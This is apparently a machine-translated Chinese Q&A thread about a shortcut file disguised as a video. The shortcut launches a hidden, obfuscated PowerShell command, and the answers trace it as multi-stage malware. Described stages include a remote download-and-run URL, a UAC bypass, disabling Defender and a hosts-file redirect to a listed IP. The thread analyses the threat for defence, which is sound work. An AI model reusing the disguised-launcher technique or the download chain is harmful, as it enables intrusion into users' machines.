我得到了一个.avi乍一看的文件,但后来我发现这实际上是一个.lnk文件,但为时已晚。
该文件的目标元素属性是
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
出发点是: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
我从以下 ASCII 代码中创建了 String,它似乎是Hallo World!. 这似乎很混乱到我,因为我无法找到NoPr,Wind并eXEc在PowerShell中的文档的任何位置参数,additionaly由于某些原因,文件有700MB的大小,直到我删除.avi从文件描述字段值。
你知道这个文件可以尝试做什么吗?
小智 7
这绝对是恶意软件!
基本上这是一个具有多个阶段的恶意软件。到目前为止,我经历了:
从http://zvd.us/1下载并执行 powershell 代码
下载的 powershell 代码包含https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1的逐字副本,这似乎是一些 UAC 绕过。然后它下载并执行(以管理员身份)一个批处理文件。
批处理文件首先尝试禁用所有 Windows Defender 组件(驱动程序、计划任务、自动运行条目)并为此添加组策略。然后它下载并执行 2 个文件。我将发布病毒总链接到文件。
第一个似乎是公认的恶意软件。而第二个是 NSIS 安装程序,我还没有完全分析。似乎hosts用它自己的系统文件替换了系统文件,将许多域重定向到 80.241.222.137 并安装了根证书。
@zoredache 似乎有要点。它只是在没有配置文件的窗口中执行命令,并以旁路模式加载执行策略(不需要代码签名)。
您可以使用以下内容进行测试(我在末尾添加了 3 个括号,但我觉得缺少了一些东西。)
$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582
不知道该代码是什么,但我认为这个想法是将 DEC ASCII 字符代码连接成一个字符串。你的“你好世界!” 据我所知,似乎偏离了目标。对于初学者来说,字符串中还有更多的字符。
http://www.asciitable.com/会建议以下内容:
SUB _ MNF RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m GMJ [ S DLE p [ J DLE i Z \ } R
| 归档时间: |
|
| 查看次数: |
1977 次 |
| 最近记录: |